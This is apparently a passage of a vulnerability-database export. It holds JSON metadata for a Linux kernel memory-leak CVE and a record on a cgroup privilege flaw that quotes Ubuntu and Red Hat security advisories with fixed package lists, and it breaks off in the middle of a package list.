        "db": "AUSCERT",
        "id": "ESB-2019.4537",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2021.1228",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.3235",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.3269",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "159250",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-151470",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19061",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151470"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19061"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011972"
      },
      {
        "db": "PACKETSTORM",
        "id": "162163"
      },
      {
        "db": "PACKETSTORM",
        "id": "159250"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19061"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1080"
      }
    ]
  },
  "id": "VAR-201911-1414",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151470"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T11:44:20.699000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "ChangeLog-5.3.9",
        "trust": 0.8,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/changelog-5.3.9"
      },
      {
        "title": "iio: imu: adis16400: fix memory leak",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/9c0530e898f384c5d279bfcebd8bb17af1105873"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "Linux kernel Remediation of resource management error vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=103000"
      },
      {
        "title": "Ubuntu Security Notice: linux, linux-aws, linux-gcp, linux-gcp-5.3, linux-kvm, linux-oracle vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-4208-1"
      },
      {
        "title": "Amazon Linux 2: ALAS2-2020-1480",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=amazon_linux2\u0026qid=alas2-2020-1480"
      },
      {
        "title": "",
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2019-19061 "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-19061"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011972"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1080"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-401",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-400",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151470"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011972"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19061"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.5,
        "url": "https://usn.ubuntu.com/4208-1/"
      },
      {
        "trust": 1.8,
        "url": "https://security.netapp.com/advisory/ntap-20191205-0001/"
      },
      {
        "trust": 1.8,
        "url": "https://cdn.kernel.org/pub/linux/kernel/v5.x/changelog-5.3.9"
      },
      {
        "trust": 1.8,
        "url": "https://github.com/torvalds/linux/commit/9c0530e898f384c5d279bfcebd8bb17af1105873"
      },
      {
        "trust": 1.8,
        "url": "https://usn.ubuntu.com/4526-1/"
      },
      {
        "trust": 1.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19061"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19061"
      },
      {
        "trust": 0.6,
        "url": "https://access.redhat.com/security/cve/cve-2019-19061"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-five-vulnerabilities-via-memory-leak-30908"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2019.4537/"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/162163/ubuntu-security-notice-usn-4904-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2021.1228"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.3269/"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.3235/"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/401.html"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/live-hack-cve/cve-2019-19061"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5967"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1350"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-4904-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.4.0-1126.140"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.4.0-1150.161"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16644"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-28038"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-20261"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16231"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-26931"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.4.0-1091.100"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.4.0-1154.164"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.4.0-208.240"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-13095"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-26930"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-16232"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19054"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12888"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4526-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-hwe/4.15.0-1083.87~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1083.87"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-4.15/4.15.0-1070.73"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-118.119"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-16166"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19073"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19067"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1054.58~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1087.95"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1096.106"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/4.15.0-1084.95~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1054.58"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oem/4.15.0-1097.107"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1084.95"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1071.75"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-9445"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-14356"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-azure/4.15.0-1096.106~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/4.15.0-118.119~16.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18808"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151470"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19061"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011972"
      },
      {
        "db": "PACKETSTORM",
        "id": "162163"
      },
      {
        "db": "PACKETSTORM",
        "id": "159250"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19061"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1080"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-151470"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-19061"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011972"
      },
      {
        "db": "PACKETSTORM",
        "id": "162163"
      },
      {
        "db": "PACKETSTORM",
        "id": "159250"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19061"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1080"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-11-18T00:00:00",
        "db": "VULHUB",
        "id": "VHN-151470"
      },
      {
        "date": "2019-11-18T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-19061"
      },
      {
        "date": "2019-11-21T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-011972"
      },
      {
        "date": "2021-04-13T20:22:22",
        "db": "PACKETSTORM",
        "id": "162163"
      },
      {
        "date": "2020-09-22T18:21:40",
        "db": "PACKETSTORM",
        "id": "159250"
      },
      {
        "date": "2019-11-18T06:15:12.403000",
        "db": "NVD",
        "id": "CVE-2019-19061"
      },
      {
        "date": "2019-11-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201911-1080"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-01-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-151470"
      },
      {
        "date": "2022-11-08T00:00:00",
        "db": "VULMON",
        "id": "CVE-2019-19061"
      },
      {
        "date": "2019-11-21T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-011972"
      },
      {
        "date": "2023-01-19T20:08:29.547000",
        "db": "NVD",
        "id": "CVE-2019-19061"
      },
      {
        "date": "2021-04-15T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201911-1080"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1080"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel Vulnerable to resource exhaustion",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-011972"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1080"
      }
    ],
    "trust": 0.6
  }
}

var-202201-0496
Vulnerability from variot

An unprivileged write to the file handler flaw in the Linux kernel's control groups and namespaces subsystem was found in the way users have access to some less privileged process that are controlled by cgroups and have higher privileged parent process. It is actually both for cgroup2 and cgroup1 versions of control groups. A local user could use this flaw to crash the system or escalate their privileges on the system. Linux Kernel There is an authentication vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Attackers can use this vulnerability to bypass the restrictions of the Linux kernel through Cgroup Fd Writing to elevate their privileges. ========================================================================== Ubuntu Security Notice USN-5368-1 April 06, 2022

linux-azure-5.13, linux-oracle-5.13 vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description: - linux-azure-5.13: Linux kernel for Microsoft Azure cloud systems - linux-oracle-5.13: Linux kernel for Oracle Cloud systems

Details:

It was discovered that the BPF verifier in the Linux kernel did not properly restrict pointer types in certain situations. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2022-1055)

Yiqi Sun and Kevin Wang discovered that the cgroups implementation in the Linux kernel did not properly restrict access to the cgroups v1 release_agent feature. (CVE-2022-0492)

J\xfcrgen Gro\xdf discovered that the Xen subsystem within the Linux kernel did not adequately limit the number of events driver domains (unprivileged PV backends) could send to other guest VMs. An attacker in a driver domain could use this to cause a denial of service in other guest VMs. (CVE-2021-28711, CVE-2021-28712, CVE-2021-28713)

J\xfcrgen Gro\xdf discovered that the Xen network backend driver in the Linux kernel did not adequately limit the amount of queued packets when a guest did not process them. An attacker in a guest VM can use this to cause a denial of service (excessive kernel memory consumption) in the network backend domain. (CVE-2021-28714, CVE-2021-28715)

Szymon Heidrich discovered that the USB Gadget subsystem in the Linux kernel did not properly restrict the size of control requests for certain gadget types, leading to possible out of bounds reads or writes. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-39698)

It was discovered that the simulated networking device driver for the Linux kernel did not properly initialize memory in certain situations. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2021-4135)

Eric Biederman discovered that the cgroup process migration implementation in the Linux kernel did not perform permission checks correctly in some situations. (CVE-2021-4197)

Brendan Dolan-Gavitt discovered that the aQuantia AQtion Ethernet device driver in the Linux kernel did not properly validate meta-data coming from the device. A local attacker who can control an emulated device can use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2021-43975)

It was discovered that the ARM Trusted Execution Environment (TEE) subsystem in the Linux kernel contained a race condition leading to a use- after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2021-44733)

It was discovered that the Phone Network protocol (PhoNet) implementation in the Linux kernel did not properly perform reference counting in some error conditions. A local attacker could possibly use this to cause a denial of service (memory exhaustion). (CVE-2021-45095)

It was discovered that the eBPF verifier in the Linux kernel did not properly perform bounds checking on mov32 operations. A local attacker could use this to expose sensitive information (kernel pointer addresses). (CVE-2021-45402)

It was discovered that the Reliable Datagram Sockets (RDS) protocol implementation in the Linux kernel did not properly deallocate memory in some error conditions. A local attacker could possibly use this to cause a denial of service (memory exhaustion). (CVE-2021-45480)

It was discovered that the BPF subsystem in the Linux kernel did not properly track pointer types on atomic fetch operations in some situations. A local attacker could use this to expose sensitive information (kernel pointer addresses). (CVE-2022-0264)

It was discovered that the TIPC Protocol implementation in the Linux kernel did not properly initialize memory in some situations. A local attacker could use this to expose sensitive information (kernel memory). (CVE-2022-0382)

Samuel Page discovered that the Transparent Inter-Process Communication (TIPC) protocol implementation in the Linux kernel contained a stack-based buffer overflow. A remote attacker could use this to cause a denial of service (system crash) for systems that have a TIPC bearer configured. (CVE-2022-0435)

It was discovered that the KVM implementation for s390 systems in the Linux kernel did not properly prevent memory operations on PVM guests that were in non-protected mode. A local attacker could use this to obtain unauthorized memory write access. (CVE-2022-0516)

It was discovered that the ICMPv6 implementation in the Linux kernel did not properly deallocate memory in certain situations. A remote attacker could possibly use this to cause a denial of service (memory exhaustion). (CVE-2022-0742)

It was discovered that the IPsec implementation in the Linux kernel did not properly allocate enough memory when performing ESP transformations, leading to a heap-based buffer overflow. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code. (CVE-2022-27666)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 20.04 LTS: linux-image-5.13.0-1021-azure 5.13.0-1021.24~20.04.1 linux-image-5.13.0-1025-oracle 5.13.0-1025.30~20.04.1 linux-image-azure 5.13.0.1021.24~20.04.10 linux-image-oracle 5.13.0.1025.30~20.04.1

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

References: https://ubuntu.com/security/notices/USN-5368-1 CVE-2021-28711, CVE-2021-28712, CVE-2021-28713, CVE-2021-28714, CVE-2021-28715, CVE-2021-39685, CVE-2021-39698, CVE-2021-4135, CVE-2021-4197, CVE-2021-43975, CVE-2021-44733, CVE-2021-45095, CVE-2021-45402, CVE-2021-45480, CVE-2022-0264, CVE-2022-0382, CVE-2022-0435, CVE-2022-0492, CVE-2022-0516, CVE-2022-0742, CVE-2022-1055, CVE-2022-23222, CVE-2022-27666

Package Information: https://launchpad.net/ubuntu/+source/linux-azure-5.13/5.13.0-1021.24~20.04.1 https://launchpad.net/ubuntu/+source/linux-oracle-5.13/5.13.0-1025.30~20.04.1

. Description:

Red Hat Advanced Cluster Management for Kubernetes 2.4.5 images

Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.4/html/release_notes/

Security fixes:

  • golang.org/x/crypto: empty plaintext packet causes panic (CVE-2021-43565)

  • nconf: Prototype pollution in memory store (CVE-2022-21803)

  • golang: crypto/elliptic IsOnCurve returns true for invalid field elements (CVE-2022-23806)

  • nats-server: misusing the "dynamically provisioned sandbox accounts" feature authenticated user can obtain the privileges of the System account (CVE-2022-24450)

  • Moment.js: Path traversal in moment.locale (CVE-2022-24785)

  • dset: Prototype Pollution in dset (CVE-2022-25645)

  • golang: syscall: faccessat checks wrong group (CVE-2022-29526)

  • go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses (CVE-2022-29810)

Bug fixes:

  • Trying to create a new cluster on vSphere and no feedback, stuck in "creating" (BZ# 1937078)

  • Wrong message is displayed when GRC fails to connect to an Ansible Tower (BZ# 2051752)

  • multicluster_operators_hub_subscription issues due to /tmp usage (BZ# 2052702)

  • Create Cluster, Worker Pool 2 zones do not load options that relate to the selected Region field (BZ# 2054954)

  • Changing the multiclusterhub name other than the default name keeps the version in the web console loading (BZ# 2059822)

  • search-redisgraph-0 generating massive amount of logs after 2.4.2 upgrade (BZ# 2065318)

  • Uninstall pod crashed when destroying Azure Gov cluster in ACM (BZ# 2073562)

  • Deprovisioned clusters not filtered out by discovery controller (BZ# 2075594)

  • When deleting a secret for a Helm application, duplicate errors show up in topology (BZ# 2075675)

  • Changing existing placement rules does not change YAML file Regression (BZ# 2075724)

  • Editing Helm Argo Applications does not Prune Old Resources (BZ# 2079906)

  • Failed to delete the requested resource [404] error appears after subscription is deleted and its placement rule is used in the second subscription (BZ# 2080713)

  • Typo in the logs when Deployable is updated in the subscription namespace (BZ# 2080960)

  • After Argo App Sets are created in an Upgraded Environment, the Clusters column does not indicate the clusters (BZ# 2080716)

  • RHACM 2.4.5 images (BZ# 2081438)

  • Performance issue to get secret in claim-controller (BZ# 2081908)

  • Failed to provision openshift 4.10 on bare metal (BZ# 2094109)

  • Bugs fixed (https://bugzilla.redhat.com/):

1937078 - Trying to create a new cluster on vSphere and no feedback, stuck in "creating" 2030787 - CVE-2021-43565 golang.org/x/crypto: empty plaintext packet causes panic 2051752 - Wrong message is displayed when GRC fails to connect to an ansible tower 2052573 - CVE-2022-24450 nats-server: misusing the "dynamically provisioned sandbox accounts" feature authenticated user can obtain the privileges of the System account 2052702 - multicluster_operators_hub_subscription issues due to /tmp usage 2053429 - CVE-2022-23806 golang: crypto/elliptic IsOnCurve returns true for invalid field elements 2054954 - Create Cluster, Worker Pool 2 zones do not load options that relate to the selected Region field 2059822 - Changing the multiclusterhub name other than the default name keeps the version in the web console loading. 2065318 - search-redisgraph-0 generating massive amount of logs after 2.4.2 upgrade 2072009 - CVE-2022-24785 Moment.js: Path traversal in moment.locale 2073562 - Uninstall pod crashed when destroying Azure Gov cluster in ACM 2074689 - CVE-2022-21803 nconf: Prototype pollution in memory store 2075594 - Deprovisioned clusters not filtered out by discovery controller 2075675 - When deleting a secret for a Helm application, duplicate errors show up in topology 2075724 - Changing existing placement rules does not change YAML file 2079906 - Editing Helm Argo Applications does not Prune Old Resources 2080279 - CVE-2022-29810 go-getter: writes SSH credentials into logfile, exposing sensitive credentials to local uses 2080713 - Failed to delete the requested resource [404] error appears after subscription is deleted and it's placement rule is used in the second subscription [Upgrade] 2080716 - After Argo App Sets are created in an Upgraded Environment, the Clusters column does not indicate the clusters 2080847 - CVE-2022-25645 dset: Prototype Pollution in dset 2080960 - Typo in the logs when Deployable is updated in the subscription namespace 2081438 - RHACM 2.4.5 images 2081908 - Performance issue to get secret in claim-controller 2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group 2094109 - Failed to provision openshift 4.10 on bare metal

  1. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2022:5626-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2022:5626 Issue date: 2022-07-19 CVE Names: CVE-2020-29368 CVE-2021-4197 CVE-2021-4203 CVE-2022-1012 CVE-2022-1729 CVE-2022-32250 =====================================================================

  1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.4 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v. 8.4) - aarch64, ppc64le, x86_64 Red Hat Enterprise Linux BaseOS EUS (v.8.4) - aarch64, noarch, ppc64le, s390x, x86_64

Security Fix(es):

  • kernel: Small table perturb size in the TCP source port generation algorithm can lead to information leak (CVE-2022-1012)

  • kernel: race condition in perf_event_open leads to privilege escalation (CVE-2022-1729)

  • kernel: a use-after-free write in the netfilter subsystem can lead to privilege escalation to root (CVE-2022-32250)

  • kernel: cgroup: Use open-time creds and namespace for migration perm checks (CVE-2021-4197)

  • kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses (CVE-2021-4203)

  • kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check (CVE-2020-29368)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

  • Failed to reboot after crash trigger (BZ#2060747)

  • conntrack entries linger around after test (BZ#2066357)

  • Enable nested virtualization (BZ#2079070)

  • slub corruption during LPM of hnv interface (BZ#2081251)

  • sleeping function called from invalid context at kernel/locking/spinlock_rt.c:35 (BZ#2082091)

  • Backport request of "genirq: use rcu in kstat_irqs_usr()" (BZ#2083309)

  • ethtool -L may cause system to hang (BZ#2083323)

  • For isolated CPUs (with nohz_full enabled for isolated CPUs) CPU utilization statistics are not getting reflected continuously (BZ#2084139)

  • Affinity broken due to vector space exhaustion (BZ#2084647)

  • kernel memory leak while freeing nested actions (BZ#2086597)

  • sync rhel-8.6 with upstream 5.13 through 5.16 fixes and improvements (BZ#2088037)

  • Kernel panic possibly when cleaning namespace on pod deletion (BZ#2089539)

  • Softirq hrtimers are being placed on the per-CPU softirq clocks on isolcpu’s. (BZ#2090485)

  • fix missed wake-ups in rq_qos_throttle try two (BZ#2092076)

  • NFS4 client experiencing IO outages while sending duplicate SYNs and erroneous RSTs during connection reestablishment (BZ#2094334)

  • using __this_cpu_read() in preemptible [00000000] code: kworker/u66:1/937154 (BZ#2095775)

  • Need some changes in RHEL8.x kernels. (BZ#2096932)

  • Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1903244 - CVE-2020-29368 kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check 2035652 - CVE-2021-4197 kernel: cgroup: Use open-time creds and namespace for migration perm checks 2036934 - CVE-2021-4203 kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses 2064604 - CVE-2022-1012 kernel: Small table perturb size in the TCP source port generation algorithm can lead to information leak 2086753 - CVE-2022-1729 kernel: race condition in perf_event_open leads to privilege escalation 2092427 - CVE-2022-32250 kernel: a use-after-free write in the netfilter subsystem can lead to privilege escalation to root

  1. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.4):

Source: kernel-4.18.0-305.57.1.el8_4.src.rpm

aarch64: bpftool-4.18.0-305.57.1.el8_4.aarch64.rpm bpftool-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-core-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-cross-headers-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-debug-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-debug-core-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-debug-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-debug-devel-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-debug-modules-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-debug-modules-extra-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-debuginfo-common-aarch64-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-devel-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-headers-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-modules-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-modules-extra-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-tools-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-tools-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm kernel-tools-libs-4.18.0-305.57.1.el8_4.aarch64.rpm perf-4.18.0-305.57.1.el8_4.aarch64.rpm perf-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm python3-perf-4.18.0-305.57.1.el8_4.aarch64.rpm python3-perf-debuginfo-4.18.0-305.57.1.el8_4.aarch64.rpm

noarch: kernel-abi-stablelists-4.18.0-305.57.1.el8_4.noarch.rpm kernel-doc-4.18.0-305.57.1.el8_4.noarch.rpm

